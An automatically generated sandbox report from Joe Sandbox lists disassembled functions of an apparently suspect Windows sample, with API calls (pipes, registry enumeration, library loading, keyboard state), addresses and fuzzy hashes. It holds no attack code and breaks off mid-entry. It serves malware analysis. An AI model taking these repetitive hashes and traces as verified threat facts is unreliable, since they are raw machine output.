                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                • Opcode ID: 9deffba6597c7d98b5a54b831486516853ec6fc03ee243b5b0b5175adec5e885
                                                • Instruction ID: b481b9075fa57d2927a190a9f779a33b0df0b05e7484c30ea99b7dfa7877b03b
                                                • Opcode Fuzzy Hash: 9deffba6597c7d98b5a54b831486516853ec6fc03ee243b5b0b5175adec5e885
                                                • Instruction Fuzzy Hash: 78219D71600249EBEF106EA4DC80EBB37A9EF49364F108629FB54D3290CB39CD51A760
                                                Function 007D6E45 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D6E65
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D6E98
                                                • GetStdHandle.KERNEL32(0000000C), ref: 007D6EAA
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007D6EE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 5de82b37448d9d8582443a4a29d003a923f6919f3911c5b0e86e21b792ace4d5
                                                • Instruction ID: 37eb4c4e348cd66071b49e1a787e9b0bee800830f762c563c98f20b595147229
                                                • Opcode Fuzzy Hash: 5de82b37448d9d8582443a4a29d003a923f6919f3911c5b0e86e21b792ace4d5
                                                • Instruction Fuzzy Hash: 5D217179600205EBDF209F29DC05AAA7BF4BF54720F20862AFCA0D73D0DB749851CB50
                                                Function 007D6F13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D6F32
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D6F64
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D6F75
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007D6FAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 7d7e5b18ac29a4d2ccb6349e30da1629fb68111dd58c5e2706da07d92c4bec06
                                                • Instruction ID: 9cc579153940d39ac887948dad90c974179b1dcaf3ffdb62028e25dfb1d84320
                                                • Opcode Fuzzy Hash: 7d7e5b18ac29a4d2ccb6349e30da1629fb68111dd58c5e2706da07d92c4bec06
                                                • Instruction Fuzzy Hash: 5F219071600605ABDB209F68AC44AA977B8AF45720F204A5AFCA0E73D0DB78A850CB60
                                                Function 007DACCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DACDE
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007DAD32
                                                • __swprintf.LIBCMT ref: 007DAD4B
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,007FF910), ref: 007DAD89
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: 564ed9015b17c12d9dc64f5f918558b5ad3de33be0d7f16e52a3ee0465cf590e
                                                • Instruction ID: ef8c75fb222468c6195214dcbbc8a5f7ac9a412379dd115a8a553a26fe7903eb
                                                • Opcode Fuzzy Hash: 564ed9015b17c12d9dc64f5f918558b5ad3de33be0d7f16e52a3ee0465cf590e
                                                • Instruction Fuzzy Hash: 61214474A00109EFCB10DF64D985DAE77B8FF89714B008069F509EB351DB75EA41CB61
                                                Function 007CA30F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                  • Part of subcall function 007CA15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CA179
                                                  • Part of subcall function 007CA15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CA18C
                                                  • Part of subcall function 007CA15C: GetCurrentThreadId.KERNEL32 ref: 007CA193
                                                  • Part of subcall function 007CA15C: AttachThreadInput.USER32(00000000), ref: 007CA19A
                                                • GetFocus.USER32 ref: 007CA334
                                                  • Part of subcall function 007CA1A5: GetParent.USER32(?), ref: 007CA1B3
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CA37D
                                                • EnumChildWindows.USER32(?,007CA3F5), ref: 007CA3A5
                                                • __swprintf.LIBCMT ref: 007CA3BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                • String ID: %s%d
                                                • API String ID: 1941087503-1110647743
                                                • Opcode ID: 0e61e9f28ac6e44ec5428760398b4cabb067a90306aa6b5a49fa7eea78e1c654
                                                • Instruction ID: b233b9b970bb52d22e158c5023666a8dd63cc9dd2faa5a0e416bac5821e18191
                                                • Opcode Fuzzy Hash: 0e61e9f28ac6e44ec5428760398b4cabb067a90306aa6b5a49fa7eea78e1c654
                                                • Instruction Fuzzy Hash: 31118C7120020DBBDF11BF64DC8AFAA7778AF44715F04807DF908AA242CA785945CB75
                                                Function 007EEC69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EED1B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EED4B
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EEE7E
                                                • CloseHandle.KERNEL32(?), ref: 007EEEFF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: 0a19a258a91b61716f41bb03a2946d36a4fea5d52fffd3c2a1b93ffba0abed51
                                                • Instruction ID: 606248a311e62c08c435916a72f718fe08e9dcbb4f0e1a3dc5859b9ffc21364f
                                                • Opcode Fuzzy Hash: 0a19a258a91b61716f41bb03a2946d36a4fea5d52fffd3c2a1b93ffba0abed51
                                                • Instruction Fuzzy Hash: 4A8153716013009FDB20DF25C88AF6AB7E5AF88750F14C81DF699DB292DBB4AC40CB56
                                                Function 007F00C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007F0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0188
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F01C7
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007F020E
                                                • RegCloseKey.ADVAPI32(?,?), ref: 007F023A
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0247
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3440857362-0
                                                • Opcode ID: 949c9eb3cb000da92afc65d8bad6a9a7676471a5211075a8991990cff85a0023
                                                • Instruction ID: 38f5a3226b4dad65f9771009721eb9f970cab3abbba8676adec1eecbacd5a346
                                                • Opcode Fuzzy Hash: 949c9eb3cb000da92afc65d8bad6a9a7676471a5211075a8991990cff85a0023
                                                • Instruction Fuzzy Hash: CB512C71108208EFD704EB54D885E7EB7E8FF84754F04892DF69587292DB38E905CB52
                                                Function 007ED9DC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007EDA3B
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007EDABE
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 007EDADA
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007EDB1B
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007EDB35
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D793F,?,?,00000000), ref: 00775B8C
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D793F,?,?,00000000,?,?), ref: 00775BB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                • String ID:
                                                • API String ID: 327935632-0
                                                • Opcode ID: 0d8dc90caa1f3ac847e2ee0c98e3a65540c3858163e95719cf088246e4282eca
                                                • Instruction ID: 54e12cb0389e0b7a83862e735628fa7162c92c80143ac58d8a5465141479ec61
                                                • Opcode Fuzzy Hash: 0d8dc90caa1f3ac847e2ee0c98e3a65540c3858163e95719cf088246e4282eca
                                                • Instruction Fuzzy Hash: C9513775A01249DFDB11EFA8C4889ADB7F4EF48320B05C069E919AB311DB38AE45CF91
                                                Function 007DE5FD Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007DE6AB
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007DE6D4
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007DE713
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007DE738
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007DE740
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: 1d7c2f7f9fa0ef16aa9d6cf99b3341f993702a1026748fba458196d5a54ac58a
                                                • Instruction ID: d354aa6aefba3068eb986a0f130609cee99a7a43e05aa4a0e2a1264e1f013c1e
                                                • Opcode Fuzzy Hash: 1d7c2f7f9fa0ef16aa9d6cf99b3341f993702a1026748fba458196d5a54ac58a
                                                • Instruction Fuzzy Hash: 67510535A00205DFDF11EF64C985AAEBBF5EF48314B1480A9E949AB362CB39ED11DB50
                                                Function 007FA088 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b43ffa6f72a8fee60d60dcf91b5471d00c806e36c015a9fab8e0b440daa031af
                                                • Instruction ID: 3c8cd06f8611ddb779edf3b7ce918adc338667993b3b301ed366bf139e8a775b
                                                • Opcode Fuzzy Hash: b43ffa6f72a8fee60d60dcf91b5471d00c806e36c015a9fab8e0b440daa031af
                                                • Instruction Fuzzy Hash: C341B3B590024CBBD710DF68CC45FB9BBB8FB09360F164265EA19A73E1CB38AD41DA51
                                                Function 00772344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00772357
                                                • ScreenToClient.USER32(008357B0,?), ref: 00772374
                                                • GetAsyncKeyState.USER32(00000001), ref: 00772399
                                                • GetAsyncKeyState.USER32(00000002), ref: 007723A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: 175b71dd5fdc58a5e97513b04f295d2c338bde2ac7324788bda8a4c012d9590a
                                                • Instruction ID: 947e83b8d94106cb221cc178da10edc945d23eeaccd4e86be69563c92cb9787d
                                                • Opcode Fuzzy Hash: 175b71dd5fdc58a5e97513b04f295d2c338bde2ac7324788bda8a4c012d9590a
                                                • Instruction Fuzzy Hash: BA41A575A04109FBCF159F68C844AEDBB75FB46360F20832AF83896291CB386951DF91
                                                Function 007C6700 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C673D
                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 007C6789
                                                • TranslateMessage.USER32(?), ref: 007C67B2
                                                • DispatchMessageW.USER32(?), ref: 007C67BC
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C67CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                • String ID:
                                                • API String ID: 2108273632-0
                                                • Opcode ID: 44ae46c5ac3661c942331c8fe74e391e802347d743389bd22f3b87729141ffe2
                                                • Instruction ID: 164d6402a10d672f280cba39428c2647086ee9372da95c0b1a94a651f794542e
                                                • Opcode Fuzzy Hash: 44ae46c5ac3661c942331c8fe74e391e802347d743389bd22f3b87729141ffe2
                                                • Instruction Fuzzy Hash: 2331A271904606AFDB208FB4CC88FB67BE8AF01308F14496DE425C61A1EB2D9489DBA0
                                                Function 007C8CE1 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007C8CF2
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 007C8D9C
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C8DA4
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 007C8DB2
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007C8DBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: 92045dec73d19b3be4910d9d0029efdcd38c0f700ed88bdf3c6cd031fa237f18
                                                • Instruction ID: c76a1f0361b55ddeea83487e498abb605a4ef6835ed78a94e23e63e963c9567e
                                                • Opcode Fuzzy Hash: 92045dec73d19b3be4910d9d0029efdcd38c0f700ed88bdf3c6cd031fa237f18
                                                • Instruction Fuzzy Hash: EC31BF71600219EBDB14CF68D94CBAE3BB5EF18315F10826DF926E62D0CBB89914DB91
                                                Function 007CB4AE Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 007CB4C6
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007CB4E3
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007CB51B
                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007CB541
                                                • _wcsstr.LIBCMT ref: 007CB54B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                • String ID:
                                                • API String ID: 3902887630-0
                                                • Opcode ID: 9e04e5656f257cab36b9d3451b2f8715771434c48392bbcb9ba967eb9c524599
                                                • Instruction ID: 3bad7d40c047699eeeab281274827ab4f8b7c478e8fbdd22ae85053279b689fa
                                                • Opcode Fuzzy Hash: 9e04e5656f257cab36b9d3451b2f8715771434c48392bbcb9ba967eb9c524599
                                                • Instruction Fuzzy Hash: 2221D772604240BEEB259B39AC0AF7B7BADDF49760F10802DF805DA161EF69DD50D6A0
                                                Function 007FB17F Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FB1C6
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007FB1EB
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007FB203
                                                • GetSystemMetrics.USER32(00000004), ref: 007FB22C
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007E0FA5,00000000), ref: 007FB24A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: a3b7177112e04f475047aec70baea9db24eb2782c35dd2fd1db168c9b32e4ccd
                                                • Instruction ID: 9e560e83fa5813837b87e65371adc01ca762b976f55deaf2b3a952ce5b47161d
                                                • Opcode Fuzzy Hash: a3b7177112e04f475047aec70baea9db24eb2782c35dd2fd1db168c9b32e4ccd
                                                • Instruction Fuzzy Hash: 8E216071614619AFCB109F38CC48A7A37A4FB45721F144B35FA36D72E0EB349914DB90
                                                Function 007C95C9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C95E2
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C9614
                                                • __itow.LIBCMT ref: 007C962C
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C9654
                                                • __itow.LIBCMT ref: 007C9665
                                                Memory Dump Source
